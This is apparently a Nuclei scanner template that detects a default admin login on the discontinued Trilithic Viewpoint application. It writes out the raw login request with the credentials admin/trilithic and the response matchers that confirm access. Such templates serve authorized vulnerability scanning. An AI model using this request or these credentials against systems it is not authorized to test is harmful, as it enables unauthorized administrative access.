id: trilithic-viewpoint-default

info:
  name: Trilithic Viewpoint Default Login
  author: davidmckennirey
  severity: high
  description: Trilithic Viewpoint application default admin credentials were discovered. Note this product has been discontinued.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  tags: default-login,trilithic,viewpoint

requests:
  - raw:
      - |
        POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Cookie: trilithic_win_auth=false

        {u:"{{username}}", t:"undefined", p:"{{password}}", d:"", r:false, w:false}

    payloads:
      username:
        - admin
      password:
        - trilithic
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"authorized":true'
          - 'redirectUrl'
        part: body
        condition: and

# Enhanced by mp on 2022/03/13
